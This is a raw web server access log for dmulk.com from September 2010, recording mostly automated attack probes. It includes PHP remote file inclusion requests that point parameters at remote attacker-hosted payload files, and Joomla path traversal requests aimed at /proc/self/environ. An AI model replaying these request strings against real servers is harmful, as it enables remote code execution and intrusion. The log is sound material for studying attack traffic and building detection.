174.133.9.196 - - [02/Sep/2010:10:48:33 -0700] "GET /logs/access_090905.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:48:42 -0700] "GET /logs/access_100131.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:49:01 -0700] "GET /logs/access_091021.log%20%20/bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:49:01 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.42 - - [02/Sep/2010:10:49:03 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:49:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:49:05 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:10:49:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
93.114.41.68 - - [02/Sep/2010:10:49:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:49:21 -0700] "GET /logs/access_091031.log%20%20//?_PHPLIB[libdir]=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:49:40 -0700] "POST /logs/access_100428.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:49:40 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:49:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:49:53 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:50:18 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:50:18 -0700] "GET /logs/access_081105.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:50:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:50:20 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:50:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:50:40 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:50:40 -0700] "POST /logs/access_100604.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:50:42 -0700] "GET /logs/access_091025.log/bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:50:53 -0700] "GET /logs/access_091021.log/bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:10:51:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:39 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:41 -0700] "GET /?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 68540 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:43 -0700] "GET /logs/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:45 -0700] "GET /?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 68539 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:45 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:49 -0700] "GET /logs/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:53 -0700] "GET /logs/access_090326.log/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:53 -0700] "GET /?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 68539 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:53 -0700] "GET /logs/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:51:58 -0700] "GET /logs/access_080412.log/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:52:14 -0700] "GET /bikes/ HTTP/1.0" 200 5629 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:52:50 -0700] "GET /logs/access_081018.log%20%20/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:52:55 -0700] "GET /logs/access_081018.log%20%20/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:10:52:57 -0700] "POST /logs/access_090304.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:10:52:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:10:52:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
83.103.72.131 - - [02/Sep/2010:10:53:01 -0700] "POST /logs/access_090322.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
83.103.72.131 - - [02/Sep/2010:10:53:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
83.103.72.131 - - [02/Sep/2010:10:53:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
67.225.166.81 - - [02/Sep/2010:10:53:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
67.225.166.81 - - [02/Sep/2010:10:53:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
67.225.166.81 - - [02/Sep/2010:10:53:12 -0700] "POST /logs/access_090322.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:10:54:45 -0700] "GET /logs/?pg=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:10:54:45 -0700] "GET /?pg=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 200 68540 "-" "Mozilla/5.0" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:10:54:47 -0700] "GET /logs/access_071129.log/?pg=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:55:11 -0700] "GET /logs/access_090326.log/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:55:11 -0700] "GET /logs/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:55:14 -0700] "POST /logs/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:55:14 -0700] "POST /fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:55:16 -0700] "GET /logs/access_080412.log/?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:10:55:16 -0700] "GET /?sourcedir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 200 68539 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:55:17 -0700] "POST /logs/access_100410.log/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:18 -0700] "POST /logs/access_100611.log%20%20/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:18 -0700] "POST /fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:18 -0700] "POST /logs/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:42 -0700] "POST /logs/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:42 -0700] "POST /fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:55:42 -0700] "POST /logs/access_100611.log/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:55:52 -0700] "GET /logs/access_081203.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.156.103 - - [02/Sep/2010:10:56:12 -0700] "POST /logs/access_100410.log%20%20/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:57:10 -0700] "POST /logs/access_100703.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:57:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:57:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
72.87.252.58 - - [02/Sep/2010:10:57:24 -0700] "GET / HTTP/1.1" 200 68468 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8" "www.dmulk.com"
72.87.252.58 - - [02/Sep/2010:10:57:48 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/media-rss.php HTTP/1.1" 200 7897 "-" "Apple-PubSub/65.20" "dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:49 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:50 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:50 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:51 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:51 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /logs/access_090602.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:10:57:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:59:49 -0700] "POST /logs/access_081025.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:59:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:59:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:06 -0700] "POST /logs/access_081230.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:06 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:13 -0700] "POST /logs/access_100604.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:00:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:01:01 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:01:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:01:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:02:00 -0700] "GET /logs/access_090905.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:02:00 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:02:01 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.85.15 - - [02/Sep/2010:11:02:39 -0700] "POST /logs/access_090322.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
74.50.85.15 - - [02/Sep/2010:11:02:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
74.50.85.15 - - [02/Sep/2010:11:02:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:02:43 -0700] "GET /logs/access_090905.log/ebmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:02:44 -0700] "GET /logs/ebmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:02:55 -0700] "GET /bikes/dteel/2008_10_24/?S=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:03:16 -0700] "GET /logs/access_090316.log/includes/messages.inc.php?include_path=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:03:24 -0700] "GET /ebmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:03:24 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:11:03:34 -0700] "GET /logs/access_080227.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:11:03:39 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:11:03:39 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:03:56 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:03:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:03:56 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
84.242.142.98 - - [02/Sep/2010:11:04:21 -0700] "GET /logs/access_100131.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://salsakaribe.com//templates/madeyourweb/css/file/MC22.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:04:30 -0700] "GET /logs/access_081203.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:05:02 -0700] "GET /logs/access_090517.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:05:03 -0700] "GET /logs/access_080703.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:05:05 -0700] "POST /logs/access_100604.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:11:05:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:11:05:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:05:14 -0700] "POST /logs/access_090322.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:05:14 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:11:05:14 -0700] "POST /logs/access_081025.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:05:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
